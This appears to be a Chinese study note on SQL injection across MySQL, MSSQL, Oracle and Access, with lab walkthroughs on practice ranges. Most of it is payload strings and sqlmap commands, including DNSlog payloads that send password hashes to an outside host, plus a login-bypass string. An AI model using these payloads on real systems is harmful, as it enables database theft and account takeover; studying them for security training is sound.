先判断是哪种数据库。再进行后续操作。
web应用程序,对用户输入的语句没有做严格的过滤,导致被输入的语句被拼接成恶意代码的SQL语句进入数据库中查询,修改信息等。
所以SQL注入漏洞需要的条件:
1、可控的参数
2、参数能带入到数据库,与数据库进行交互
1、获取管理员账号密码,控制数据库
2、数据库信息泄露,修改等
3、导致服务器被控制。
1、最小化权限,给数据库设置最小权限
2、对用户输入的参数进行严格的过滤
3、使用预编译语句和参数化查询
4、不要暴露SQL语句错误的信息
根据注入请求方法类型,可以分为GET注入、POST注入、HTTP头注入
GET注入:HTTP请求方法为GET,参数显示在url中,如?id=1 id注入点
POST注入:HTTP请求方法为POST,参数在请求体中,注入点在请求体中
HTTP头注入:注入点在HTTP头中,如ua、cookie、referer等HTTP头中
有整数型注入和字符型注入。
整数型注入:参数为数字
字符型注入:参数为字符,需要注释闭合。
在字符型注入中,有单引号闭合,双引号闭合,小括号,大括号闭合等
union联合查询注入方式
报错注入方式
布尔盲注方式
时间盲注方式
dnslog注入方式
宽字节注入方式
http头注入方式
order by注入方式
undate注入方式
insert注入方式
二次注入
堆叠注入
等等方式(后续再补充)
适用于页面出现回显位置。
-1 union select 1,2,group_concat(schema_name) from information_schema.schemata 查询所有数据库的名称
-1 union select 1,2,database() 查询当前数据库名称
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='库名' 查询数据库下的所有表名信息
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='库名' and table_name='表名' 查询数据库下某表的所有字段信息
-1 union select 1,2,group_concat(列名1,'
',列名2) from 库名.表名 查询数据
注:limit m,n 可以控制输出的多少。 m表示从m开始,n表示输出多少。
比如limit 0,1 就是从0行开始,输出1行。
适用于页面没有回显位置,但是有SQL语句出错的信息。
常用函数:updatexml()、concat()
语法:updatexml(XML_documen,XPath_string,new_value)、
实例:updatexml(1,concat(‘!’,database(),‘!’),1)
在updatexml函数中第一个参数为需要更新的名称,第二个参数为路径,第三个参数为更新的名称
concat是拼接函数,如果路径中存在特殊符号,比如~,!等就会报错;同时显示路径参数的内容。
实例中,有特殊符号!,所以会报错,并且把数据库名称显示出来。
ps:由于updatexml()返回的字符串长度最多为31个字符,所以这里可以通过substr函数分两步来截取。
1、select updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),1,31)),1);
从1个字符开始截取,截取31个字符。
2、select updatexml(1,concat('~',substr((select group_concat(schema_name) from information_schema.schemata),32,31)),1);
从32个字符开始,截取31个字符。
布尔盲注适用于,没有回显位置,不能使用union联合查询注入方式,没有回显SQL语句错误的信息,也不能使用报错注入方式。
但是会回显正确的页面和错误的页面。
这里需要注意的是,在手工布尔盲注的时候,我们需要先找到一个参数是查询正确的页面,比如id=1,先找到正确的页面,然后再正确的页面上构造闭合注释,然后才去进行猜测数据。
常用函数:length(),substr(),ascii()
length()函数:返回字符串长度
substr()函数:截取字符串 语法substr(参数1,参数2,参数3)
参数1是要截取的字符串,参数2是从哪里开始截取,参数3是要截取多少
ascii()函数:将字符转化为ascii码
实例:
1、查询数据库的长度:1' and (select length(database())>1)--+
2、查询数据库的名称:1' and (ascii(substr((database()),1,1)))>1 --+
3、查询数据库表的数量:1' and (select count(*) table_name from information_schema.tables where table_schema='库名')>1 --+
4、查询表的长度:1' and (select length(table_name) from information_schema.tables where table_schema='库名' limit m,n)>1 --+
ps:limit m,n m是从哪里开始,n是输出多少 通过修改m的值,则可以把所有的表都查询长度
5、查询表的名称:1' and (ascii(substr((select table_name from
information_schema.tables where table_schema='库名' limit m,n),1,1)))>1 --+
ps:同样是修改limit m,n 控制第几张表 而通过控制substr函数的参数2,修改表名称的第几位
6、查询字段的数量:1' and (select count(*) column_name from information_schema.columns where table_schema='库名' and table_name='表名')>1 --+
7、查询字段的长度:1' and (select length(column_name) from information_schema.columns where table_schema='库名' and table_name='表名' limit m,n)>1 --+
8、查询字段的名称:1' and (ascii(substr((select column_name from
information_schema.columns where table_schema='库名' and table_name='表名' limit m,n),1,1)))>1 --+
9、查询数据的数量:1' and (select count(*) 字段名 from 库名.表名)>1 --+
10、查询数据:1' and (ascii(substr((select 字段名 from 库名.表名 limit 0,1),1,1)))>1 --+
时间盲注适用于,不能使用union联合查询(没有回显位置),不能使用报错注入(没有返回错误的sql语句),也不能使用布尔盲注(没有正确的页面和错误的页面),也就是不管语句是对的,还是错的,都是回显一样的页面。这时可以使用时间盲注。
这里需要注意的是,时间盲注,也需要找到一个正确的数据,然后and的时候,后面接上需要判断的语句。
所以需要if函数判断对错、substr函数截取字符、ascii函数转换字符、slee函数
常用函数
if(ex1、ex2、ex3)
当ex1正确的时候,执行ex2,否则执行ex3
实例
0、判断注入类型:1' and sleep(5) --+
1、判断数据库长度:1' and (if(length(database())=7,sleep(5),1)) --+
2、判断数据库名称:1' and (if((ascii(substr((database()),1,1))=112),sleep(5),1)) --+
3、判断表的数量:1' and (if((select count(*) table_name from
information_schema.tables where table_schema='数据库名')=5,sleep(5),1)) --+
4、判断表的长度:1' and (if((select length(table_name) from information_schema.tables where table_schema='库名' limit 0,1)=8,sleep(5),1)) --+
5、判断表的名称:1' and (if(ascii(substr((select table_name from information_schema.tables where table_schema='库名' limit 0,1),1,1))=104,sleep(5),1)) --+
6、判断字段的数量:1' and (if((select count(*) column_name from information_schema.columns where table_schema='库名' and table_name='表名')=6,sleep(5),1)) --+
7、判断字段的长度:1' and (if((select length(column_name) from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1)=2,sleep(5),1)) --+
8、判断字段的名称:1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),1,1))=105,sleep(5),1) --+
9、判断数据的数量:1' and if((select count(*) 字段名 from 库名.表名)=3,sleep(5),1) --+
10、判断数据的长度:1' and if((select length(字段名) from 库名.表名 limit 0,1)=5,sleep(5),1)--+
11、判断数据的名称:1' and if((ascii(substr((select 字段名 from 库名.表名 limit 0,1),1,1))=97),sleep(5),1)--+
dnslog注入适用于,存在布尔盲注的时候,时间盲注是布尔盲注不可用,但是dnslog注入相反,存在布尔盲注的时候,一个一个的去测很麻烦,这时就可以使用dnslog注入。
需要的条件:
1、公网服务器
2、开启secure_file_priv读写权限
3、window平台,使用UNC路径
load_file函数:是读取文件并返回文件内容为字符串
实例
首先去dnslog.cn获取一个服务器,dnslog有时候打不开。
这里使用dig.pm
比如:获取得到 6a182d34.ipv6.1433.eu.org.
select load_file("\\6a182d34.ipv6.1433.eu.org.\abc");
1、获取数据库信息:1' and load_file(concat('\\\\',(select database()),'.4wf899.dnslog.cn\\abc')) --+
ps:注意服务器前面要加上 .
为什么需要四个\\\\,\可能会被当成转移字符,所以再\前面再加上\就表示这里是一个\符号,而不是转移字符。
2、获取表名信息:1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='库名' limit 0,1),'.6a182d34.ipv6.1433.eu.org.\\abc')) --+
3、获取列名信息:1' and load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1),'.6a182d34.ipv6.1433.eu.org.\\abc')) --+
4、获取数据:1' and load_file(concat('\\\\',(select password from 库名.表名 limit 0,1),'.6a182d34.ipv6.1433.eu.org.\\abc')) --+
ps:在获取密码的时候,由于密码可能太长,导致无法带出,所以需要截取函数substr。
1' and load_file(concat('\\\\',substr((select password from 库名.表名 limit 2,1),1,31),'.6a182d34.ipv6.1433.eu.org.\\abc')) --+
从第一位开始截取31位,发现能dnslog能带出了,然后再从32位开始截取31位,这样就能将密码加密的md5带出了。
什么是宽字节?宽字节是相对于ascii这样的单字节编码来说的,常见的宽字节有GBK,utf-8等.GBK汉字占两个字节,utf-8汉字占三个字节
宽字节注入适用于,为了防止SQL注入,使用了转义函数(addslashes/mysql_real_escape_string/mysql_escape_string等,还有一个情况是魔术引号,magic_quote_gpc,不过魔术引号已经在高版本的php中去除了) 将客户输入的特殊字符(’ " 等测试sql注入字符)转义为\ ’ 的情况下
所以在使用宽字节注入的时候,必须要的一个条件就是MySQL数据库使用GBK编码。
在MySQL数据库使用宽字节(如GBK编码)的时候,会认为两个字符是一个汉字,当我们输入单引号的时候,转义函数会将单引号转义为\ ' ,而如果我们在\的前面再加上一个字符,那么加上的这个字符就和\组成了一个汉字,而后面的单引号就逃逸出来了
这里\的url编码为%5c,也就是在%5c前面加上一个大于ascii码的字符就可以与%5c变成一个字符.如%df
所以%df%5c就是一个中文字符'運'
如果%df被禁止了,怎么办?还可以使用%de,%de%5c组成中文字符'轡'
0、在post请求方法、字符型注入类型、宽字节注入+union注入方式下
1、判断字段数:1%df' and 1=2 order by 1,2 --+
2、判断回显位置:1%df' and 1=2 union select 1,2 --+
3、判断数据库信息:1%df' and 1=2 union select 1,database() --+
4、判断表名信息:1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
5、判断列名信息:1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1)--+
ps:这里查询列名的时候,不得不用到',那么这里有两个方法,可以绕过单引号
一、子嵌套法:就像上面的语句,在where条件列名的时候,再查询一次,并且通过limit来控制第几张表
二、将库名、表名转化为hex
5、判断列名:1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x68747470696E666F --+
6、判断数据:1%df' and 1=2 union select 1,group_concat(id,userid) from pikachu.httpinfo --+
1、检测是否存在宽字节注入:sqlmap -u "http://ctf.aabyss.cn:80/vul/sqli/sqli_widebyte.php?__CBK=3f5392529cfb9e2c01d71d0b4dc9d4ad21688026197_3146" --data="name=1 * ^&submit=%E6%9F%A5%E8%AF%A2" --batch --tamper unmagicquotes
ps:利用脚本 --tamper unmagicquotes检测是否存在宽字节注入
2、爆数据库名:
什么是http头注入?有时候,我们的输入的参数会被防护,但是网站会记录我们的cookie、user-agent、referer等信息,而且与数据库交互,并未对我们的http头信息进行过滤,这时我们就可以在http头这里使用sql注入。
在手工http头注入的时候,需要配合我们的报错注入来结合。
所以需要使用我们的updatexml函数。
updatexml(1,concat(0x7e,(查询的语句),0x7e),1)
在pikachu靶场中的http头注入练习,首先需要登录账号。
登陆之后,发现信息被记录,这时候使用抓包,然后刷新页面。得到user-agent、referer等信息。
http头注入,不能使用union联合查询方式注入。
1、查询数据库名:在对应的http头,1' and updatexml(1,concat(0x7e,database()),1) or'
ps:为何要使用or' 去闭合后面的语句,而不能使用注释符,我也未搞清楚
2、查询表名:1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),0x7e),1) or'
3、查询字段名:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu'),0x7e),1) or'
4、查询数据:1' and updatexml(1,concat(0x7e,(select group_concat(username) from pikachu.users),0x7e),1) or'
ps:如果是查密码,而不是账户,密码一般是md532位加密,但是updatexml回显只能31位,所以就需要substr函数去截取。
5、查询密码:1' and updatexml(1,concat(0x7e,substr((select group_concat(password) from pikachu.users),1,31),0x7e),1) or'
1' and updatexml(1,concat(0x7e,substr((select group_concat(password) from pikachu.users),32,31),0x7e),1) or'
1、检查是否存在http头注入:sqlmap -u "http://challenge-227d15088418bb53.sandbox.ctfhub.com:10800/" --level=3 --batch
ps:在level等级为2的时候会检查cookie是否存在注入,在level等级为3的时候会检查http头是否存在注入。
2、曝出数据库:sqlmap -u "http://challenge-227d15088418bb53.sandbox.ctfhub.com:10800/" --level=3 --batch --dbs
3、曝出表名:sqlmap -u "http://challenge-227d15088418bb53.sandbox.ctfhub.com:10800/" --level=3 --batch -D ”库名“ --tables
4、曝出字段名:sqlmap -u "http://challenge-227d15088418bb53.sandbox.ctfhub.com:10800/" --level=3 --batch -D ”库名“ -T ”表名“ --columns
5、曝出数据:sqlmap -u "http://challenge-227d15088418bb53.sandbox.ctfhub.com:10800/" --level=3 --batch -D ”库名“ -T ”表名“ -C ”字段名“ --dump
insert/undate/delete 和select不同之处在于,他们是一个操作,而不是查询,所以不能与union做联合查询,可以通过报错的方式回显。
insert增,通常用于注册的时候,插入我们的sql语句;
在文本框中输入的只是账号密码等,实际执行的sql语句是:
insert into 表名 (字段1,字段2,字段3) vlaues (1,2,3);
delete删,通常用于留言板,或者删除一些其他的数据时;
实际执行的sql语句是:
delete from 表名 where 条件=xx;
update改, 通常用于修改个人信息的时候,
实际执行的sql语句是:
update 表名 set 字段1=xxx,字段2=xxx,字段3=xxx where 条件=xxx;
insert在MySQL数据库中是增加的意思。用pikachu数据库为例子。
如下图,在pikachu数据库中的member表下,有id,username,pw,sex,phonenum,address,email
所以我们插入数据的时候是这样写
insert into 表名 (id,username,pw,sex,phonenum,address,email) values (8,'afan','123456',1,2,3,4)
注意如果插入的数据是字符,那么需要单引号,查询表下的结构,使用desc 表名即可
所以pikachu靶场中insert注入,在注册时,插入我们的sql语句。
1' and updatexml(1,concat(0x7e,(database()),0x7e),1) and'
ps:这里注意,因为在注册的时候,在用户这一栏插入语句,所以语句的两头应该有' '
所以正常的语句应该如下:
'1' and updatexml(1,concat(0x7e,(database()),0x7e),1) and''
1、查询数据库名字:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) and'
2、查询表名:1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),1) and'
3、查询字段名:1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),0x7e),1) and'
4、查询数据:1' and updatexml(1,concat(0x7e,(select username from pikachu.users limit 0,1),0x7e),1) and'
ps:同样的问题,报错注入,在查询密码的时候,只能回显31位,所以需要使用substr截取函数,来截取前31位,然后从32位再截取。
查询密码:1' and updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),1,31),0x7e),1) and'
1' and updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),32,31),0x7e),1) and'
update在MySQL数据库,是更新的意思。同样以pikachu数据库为例子。
所以我们更新数据的语句是
update 表名 set 字段名1=xx,字段名2=xx where 条件=xx
ps:如果字段的类型是字符型,那么需要加上‘ ’
例如:update member set username='chaofan',pw='111111',sex='boy',phonenum='123',address='yanhe',email='9348' where id=28;
首先使用注册的账号密码,从update注入页面登录到pikachu
这里其实,还是利用修改信息的时候,插入报错语句,让其进行报错回显。
1、查询数据库名字:1' and updatexml(1,concat(0x7e,(database()),0x7e),1) and'
2、查询表名:1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),1) and'
3、查询字段名:1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),0x7e),1) and'
4、查询数据:1' and updatexml(1,concat(0x7e,(select username from pikachu.users limit 0,1),0x7e),1) and'
ps:同样的问题,报错注入,在查询密码的时候,只能回显31位,所以需要使用substr截取函数,来截取前31位,然后从32位再截取。
查询密码:1' and updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),1,31),0x7e),1) and'
1' and updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),32,31),0x7e),1) and'
delete在MySQL数据库,是删除的意思。同样以pikachu数据库为例子。
所以我们删除数据的语句是:
delete from 表名 where 条件=xxx;
所以我们删除的时候,实际上是在执行这一条语句。
所以在delete注入的时候,插入sql语句:
delete from 表名 where 条件=xxx or updatexml(1,concat(0x7e,(database()),0x7e),1)
or逻辑或,一个条件为真,则为真。
以pikachu为例子:
在delete注入模块,抓点击删除的包。然后发现在url中有id=56,单引号之后,发现报错,说明存在sql注入。
1、曝出数据库名:56 or updatexml(1,concat(0x7e,database(),0x7e),1)
url编码:
56+or+updatexml(1,concat(0x7e,database(),0x7e),1)+
ps:将代码改为url编码的格式,不然会报错,因为这是GET请求方式
2、曝出表名:56 or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),1)
url编码:
56+or+updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema%3d'pikachu'+limit+3,1),0x7e),1)+
3、查询字段名:56 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='pikachu' and table_name='users' limit 0,1),0x7e),1)
url编码:
56+or+updatexml(1,concat(0x7e,(select+column_name+from+information_schema.columns+where+table_schema%3d'pikachu'+and+table_name%3d'users'+limit+1,1),0x7e),1)
4、查询数据:56 or updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),1,31),0x7e),1)
ps:同样的问题,报错注入,在查询密码的时候,只能回显31位,所以需要使用substr截取函数,来截取前31位,然后从32位再截取。
查询密码:56 or updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),1,31),0x7e),1)
url编码:56+or+updatexml(1,concat(0x7e,substr((select+password+from+pikachu.users+limit+0,1),1,31),0x7e),1)
56 or updatexml(1,concat(0x7e,substr((select password from pikachu.users limit 0,1),32,31),0x7e),1)
url编码:
56+or+updatexml(1,concat(0x7e,substr((select+password+from+pikachu.users+limit+0,1),32,31),0x7e),1)
首先呢先判断有没有注入点。
单引号 、双引号、小括号、大括号等等字符判断。
方法一:
如果存在注入点。再进一步判断注入类型。
and 1=1 和 and 1=2 查看返回的页面是否一样。一样为字符型,不一样为数字型。
原因:‘and 1=1’ ‘and 1=2’ 字符型会有单引号把输入的字符包起来 所以不会逻辑问题上不会报错。
方法二:
还有一种方法,单引号发现报错之后,在单引号后面加上注释符号。如果回显正常了,那么是字符型,如果加上注释之后,还是报错,那么是数字型。
**原因:**输入的单引号,去闭合前面的单引号,后面的那个单引号被注释符注释了。所以闭合完成。
mysql -u root -p 进入mysql数据库
\q 退出MySQL数据库
show databases; 查看所有数据库名称
use 数据库名字; 使用某数据库
select database(); 查询当前使用数据库名称
show tables; 查看当前数据库下的所有表
select version(); 查询当前数据库版本
select user(); 查询当前用户
select now(); 查询当前时间
desc 表名; 查询表的结构
select * from 表名; 查询表中的所有记录
select user,password from 表名; 只查询表中user和password的记录
select user,password from 表名 where user=‘xx’; 只查询user=xx的user和password信息
万能密码:
admin
’ or ‘1’=‘1’ or是逻辑或的意思,只要有一个条件为真,它就为真。
access数据库只有一个数据库。
可以输入,单引号,and 1=1 ,and 1=2判断
order by
使用union联合查询,查询表名,但是需要注意的是,表名需要自己猜解,所以遇到access数据库,直接上sqlmap跑
这里字段名也需要猜解,然后查询 字段名 from 表名
偏移注入,适用于,已经知道了表名,但是不知道字段名的情况下。
由于已经知道了,字段数,表名
所以直接将最大的字段数22,改为*,访问页面,看正常与否,然后删除,并将21改为 * ,直到页面正常为止,如果此时字段数已经为16了,那么一个 * 就代表6个字段。
一级偏移注入:(减去6个字段)
UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (admin as a inner join admin as b on a.id = b.id)
二级偏移注入:(再减去6个字段)
UNION SELECT 1,2,3,4,a.id,b.id,c.id,*from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
mssql数据库,又叫sqlserve数据库。
Mssql数据库的注入与MySQL数据库差不多。
Mssql数据库也自带information_schema.tables columns schemata
注入过程也大同小异,其中
数据库名db_name()
用户登陆名suser_name(),sa是最高权限。
sysobjects 存放了所有的表名
syscolumns 存放了所有的字段名
使用MySQL数据库的规则查询
这里还是与MySQL数据库一样判断
order by
在查看回显位置的时候,就有点不同了,mssql数据库,对类型比较严格,我们这里可以采用猜解的思路。
先 1 and 1=2 union all select null,null,null ,用null去填充位置,
然后将第一个null改为1,看看是否报错,如果报错,那么则1这个位置就是字符型,在书写的时候就得加上’ '。
1 and 1=2 union all select ‘a’,null,null
在查询表名的时候,需要注意。
1 and 1=2 union all select 1,table_name,3 from information_schema.tables
这一句可以查找一个表,比如为flags,那么我们要查第二张表怎么查?
1 and 1=2 union all select 1,table_name,3 from information_schema.tables where table_name<>'flags'
ps: <>这个符号是不等于的意思
比如第二张为news,那么第三张表怎么查?
1 and 1=2 union all select 1,table_name,3 from information_schema.tables where table_name<>'flags' and table_name<>'news'
同查询表名一样。
查询flags表里的第一个字段
1 and 1=2 union all select 1,column_name,3 from information_schema.columns where table_name='flags'
如果查出来,第一个字段名为flag,要查询表里面的第二个字段
1 and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='flags' and column_name<>'flag'
1 and 1=2 union select 1,flag,3 from flags
union select 字段名 from 表名
这就是我们Mssql数据库使用MySQL数据库的规则查询数据的过程
Mssql数据库自带表sysobject,在表中,有我们数据库的所有表名。
在sysobject表中,需要注意三个字段,一个字段是name,第二个字段是id(id需要在后面查询字段名的时候使用),还有一个是xtype,xtype是类型的意思,而xtype=‘u’,意思就是用户自己创建的表
1 and 1=2 union select id,name,3 from sysobject where xtype='u'
这个意思就是我们要查询,id,name,而且xtype=‘u’,从我们自带的sysobject表中查。
比如查出来的第一张表是901578250 news
要查询第二张表名
1 and 1=2 union select id,name,3 from sysobject where xtype='u' and name<>'news'
得到id值之后,下一步要去查它的字段名。
1 and 1=2 union select 1,name,3 from syscolumns where id=查到的id值
1 and 1=2 union select 1,name,3 from flags
以墨者靶场的sqlserver靶场为例子
使用and 1=1 和and 1=2
发现回显不一样,这是一个整数型的sqlserver注入。
order by
这里order by 2 的时候正常 3的时候错误 4的时候又正常
应该是一个小bug,所以暂时不需要管,看成4个字段即可。
这里需要注意,与MySQL数据库不同的地方是union select不能用了,而是使用union all select
id=2 and 1=2 union all select null,null,null,null
然后不断的修改null,查看null位置处是整数还是字符。
id=2 and 1=2 union all select 1,2,'3',4
id=2 and 1=2 union all select 1,2,table_name,4 from information_schema.tables
manage
id=2 and 1=2 union all select 1,2,table_name,4 from information_schema.tables where table_name<>'manage'
announcement
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='manage'
id
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='manage' and column_name<>'id'
username
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='manage' and column_name<>'id' and column_name<>'username'
password
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='manage' and column_name<>'id' and column_name<>'username' and column_name<>'password'
另外一个表announcement
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='announcement'
id
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='announcement' and column_name<>'id'
title
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='announcement' and column_name<>'id' and column_name<>'title'
contents
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='announcement' and column_name<>'id' and column_name<>'title' and column_name<>'contents'
times
id=2 and 1=2 union all select 1,2,column_name,4 from information_schema.columns where table_name='announcement' and column_name<>'id' and column_name<>'title' and column_name<>'contents' and column_name<>'times'
id=2 and 1=2 union all select 1,username,password,4 from manage
admin_mz
72e1bfc3f01b7583 md5撞库为 97285101
注意啊,这里得到的密码,还是md5加密的,先去md5撞库得到密码
恭喜你 admin_mz 成功登录用户管理后台,KEY: mozhe2fb22b308899e00cd55350d36a9
需要利用sysobjects表
id=2 and 1=2 union all select 1,id,name,4 from sysobjects where xtype='u'
得到id=5575058
表名=manage
id=2 and 1=2 union all select 1,id,name,4 from sysobjects where xtype='u' and name<>'manage'
id=101575400
表名=announcement
得到id之后,就可以查询字段名了,因为每个id对应的字段名不一样
这里需要使用另外一个表,syscolumns
id=2 and 1=2 union all select 1,2,name,4 from syscolumns where id=5575058
id
id=2 and 1=2 union all select 1,2,name,4 from syscolumns where id=5575058 and name<>'id'
username
id=2 and 1=2 union all select 1,2,name,4 from syscolumns where id=5575058 and name<>'id' and name<>'username'
password
得到表名manage,字段名username,password
id=2 and 1=2 union all select 1,username,password,4 from manage
得到账号密码
admin_mz
72e1bfc3f01b7583
与MySQL一样,报错注入,适用于没有回显点的情况。
在报错注入之前,先了解一个函数
convert()函数 ,是把日期转换为新数据类型的通用函数。
原理:
and id= convert(int,@@version)
对于convert(int,@@version),convert函数首先会执行第二个参数指定的SQL查询,然后尝试将查询结果转换为int类型,但是由于这个SQL查询的结果是varchar类型,无法进行指定的转换,所以,convert函数会曝出一个SQL server错误消息,这样就能得到这个SQL查询的结果了。
convert(int,@@version) 获取版本信息
convert(int,db_name) 数据库名字
convert(int,user) 当前用户名
convert(int,@@SERVERNAME) 获取有关服务器主机的信息
id=2 and convert(int,(select top 1 name from sysobjects where xtype='u'))
top 1这里就是限制输出一条的意思。、
同样的,如果想继续查下面的表
id=2 and convert(int,(select top 1 name from sysobjects where xtype='u')) where name<>'表名'
由于不知道id了,所以在查询表名的时候,还是采用MySQL数据库的方法
id=2 and convert(int,(select top 1 column_name from information_schema.columns where table_name='表名'))
如果不止一条数据,
id=2 and convert(int,(select top 1 column_name from information_schema.columns where table_name='表名' and column_name<>'字段名'))
id=2 and convert(int,(select top 1 字段名 from 表名))
最后推荐一篇关于mssql数据库,写的很全面的文章
https://www.anquanke.com/post/id/248896#h3-4
一般在大型企业会用到Oracle数据库,Oracle很讲究语法规则,Oracle有一个Dual(实表)虚表,用来拼凑语法规则的,分页查询使用top
Dual是一个虚表,没有什么特别的意义,为了符合查询语法而诞生的。
查询用户名: select user from dual
加减法:select 9+1 from dual
Select * from all_tables 查询所有的表
Select * from user_all_tables 查询当前用户的表
Select * from all_tab_columns 查询所有字段
Select * from user_tab_columns 查询当前用户的字段
Select * from v$version 查询版本
rownum是限制输出的,比如news 表里面有3条数据
比如:select * from news where rownum=1 那么就只输出第一行
select * from news where rownum=1 and xx<>xx 就可以输出第二行
这里的判断类型与MySQL一样
单引号,and 1=1,and 1=2等
order by
这里判断回显的类型的时候,跟MySQL数据库不一样,同样需要null占位,然后一一判断。
1 and 1=2 union select '1','2' from dual
1 and 1=2 union select 1,table_name,3 from user_all_tables where rownum=1
继续查询第二条
1 and 1=2 union select 1,table_name,3 from user_all_tables where rownum=1 and table_name<>'xxx'
1 and union select 1,column_name,3 from user_tab_columns where table_name='xxx' and rownum=1
查询第二条数据
1 and union select 1,column_name,3 from user_tab_columns where table_name='xxx' and rownum=1 and column_name<>'xxx'
。。。。。。
1 and union select 1,字段名,3 from 表名
首先需要了解一个函数
CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))
这是去查询关于主题的关键词,然后因为查询失败(应该是用户没有查询和创建的权限,默认情况没有创建,爆出未查询到的结果从而曝出查询的内容)
比如:
1 and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1)) 查询数据库版本
为什么要1=?
因为Oracle的语言严谨,where后面跟的都是条件,单独的字符串不能作为条件,比较才能作为条件,存在的字段名等于这个字符串也可以作为条件。
1 and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum cf,table_name from user_all_tables) where cf=2)
要查其他表,则修改cf=xx就行
1 and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum cf,column_name from user_tab_columns) where cf=2)
获取用户名 id=1 and 1=ctxsys.drithsx.sn(1,‘~’%7c%7c(select user from dual)%7c%7c’~') --+
获取表名 id=1 and 1=ctxsys.drithsx.sn(1,‘~’%7c%7c(select table_name from all_tables where rownum=1 and owner=‘TEST’)%7c%7c’~') --+
获取字段名id=1 and 1=ctxsys.drithsx.sn(1,‘~’%7c%7c(select column_name from all_tab_columns where owner=‘TEST’ and table_name=‘USERS’ and rownum=1)%7c%7c’~') --+
获取数据id=1 and 1=ctxsys.drithsx.sn(1,‘~’%7c%7c(select username from test.users where rownum=1)%7c%7c’~') --+
oracle数据库详解:https://cloud.tencent.com/developer/article/1944116
and 1=1 和 and 1=2 返回不一样
是一个整数型注入
order by
1 and 1=2 union select null,null from dual
dual表,任何人都可以查,这么写只是为了满足Oracle的语法规则
然后不断的改变null类型,从整数到字符。
1 and 1=2 union select (select distinct owner from all_tables where rownum=1),'2' from dual
SYS
1 and 1=2 union select (select distinct owner from all_tables where rownum=1 and owner<>'SYS'),'2' from dual
OUTLN
1 and 1=2 union select (select distinct owner from all_tables where rownum=1 and owner<>'SYS' and ower<>'OUTLN'),'2' from dual
1 and 1=2 union select '1',table_name from user_all_tables where rownum=1
LOGMNR_PARAMETER$
1 and 1=2 union select '1',table_name from user_all_tables where rownum=1 and table_name<>'LOGMNR_PARAMETER$'
LOGMNR_SESSION$
1 and 1=2 union select '1',table_name from user_all_tables where rownum=1 and table_name<>'LOGMNR_PARAMETER$' and table_name<>'LOGMNR_SESSION$'
MVIEW$_ADV_WORKLOAD
1 and 1=2 union select '1',table_name from user_all_tables where rownum=1 and table_name<>'LOGMNR_PARAMETER$' and table_name<>'LOGMNR_SESSION$' and table_name<>'MVIEW$_ADV_WORKLOAD'
MVIEW$_ADV_BASETABLE
。。。。。。
这里由于表太多,我们直接使用模糊查询
1 and 1=2 union select (select table_name from user_all_tables where rownum=1 and table_name like '%user%'),'2' from dual
sns_users
1 and 1=2 union select (select table_name from user_all_tables where rownum=1 and table_name like '%user%' and table_name<>'sns_users'),'2' from dual
发现只有这一张表
1 and 1=2 union select '1',column_name from user_tab_columns where rownum=1 and table_name='sns_users'
USER_NAME
1 and 1=2 union select '1',column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name<>'USER_NAME'
USER_PWD
1 and 1=2 union select '1',column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name<>'USER_NAME' and column_name<>'USER_PWD'
STATUS
。。。。。
1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
最后这里需要加上" ",双引号,应该是Oracle数据库的规则。
得到账号密码
zhong
1c63129ae9asc60asdua94d3e00495
这里有一个坑就是,这个不是真的墨者账号密码,还需要继续查数据
1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME<>'zhong'
hu
1c63129ae9db9g20asdua94d3e00495
